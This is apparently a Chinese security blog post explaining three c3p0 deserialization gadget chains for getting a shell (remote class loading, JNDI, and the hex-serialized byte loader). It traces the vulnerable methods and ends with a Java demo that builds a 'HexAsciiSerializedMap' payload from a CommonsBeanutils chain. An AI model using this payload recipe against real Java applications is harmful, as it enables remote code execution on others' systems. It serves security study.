c3p0的三个gadget的学习
目前c3p0有三种方式getshell
- 加载远程类
- jndi
- hex序列化字节加载器
前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法
123 |
if (o instanceof IndirectlySerialized) { o = ((IndirectlySerialized)o).getObject();} |
而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看
触发jndi
很明显如果contextName不为空,则会触发,这里没必要继续说下去了
加载远程类
接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据
关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的
hex序列化字节加载器
这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用
当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发,而这个监听器正好在设置完userOverridesAsString就会调用
可以看到里面对序列化数据的处理
123456789 |
public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException { if (userOverridesAsString != null) { String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1); byte[] serBytes = ByteUtils.fromHexAscii(hexAscii); return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes)); } else { return Collections.EMPTY_MAP; }} |
最后触发原生反序列化
后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString
1
|
String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);
|
这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样
1
|
String payload = "HexAsciiSerializedMap:"+HexString+":";
|
这里给个demo方便测试
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152 |
import com.govuln.deserialization.CB1;import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;import hudson.remoting.Base64;import javassist.ClassPool;import javassist.CtClass;import org.python.antlr.ast.Str;import java.io.*;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.lang.reflect.Modifier;import java.util.HashSet;import java.util.LinkedList;import java.util.PriorityQueue;public class Test { public static byte[] toByteArray(InputStream in) throws IOException { byte[] classBytes; classBytes = new byte[in.available()]; in.read(classBytes); in.close(); return classBytes; } public static String bytesToHexString(byte[] bArray, int length) { StringBuffer sb = new StringBuffer(length); for(int i = 0; i < length; ++i) { String sTemp = Integer.toHexString(255 & bArray[i]); if (sTemp.length() < 2) { sb.append(0); } sb.append(sTemp.toUpperCase()); } return sb.toString(); } public static void main(String[] args) throws Exception { byte[] data = CB1.getPayload(); String HexString = bytesToHexString(data, data.length); System.out.println(HexString.length()); String payload = "HexAsciiSerializedMap:"+HexString+":"; WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource(); wrapperConnectionPoolDataSource.setUserOverridesAsString(payload); }} |
- source:y4tacker
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论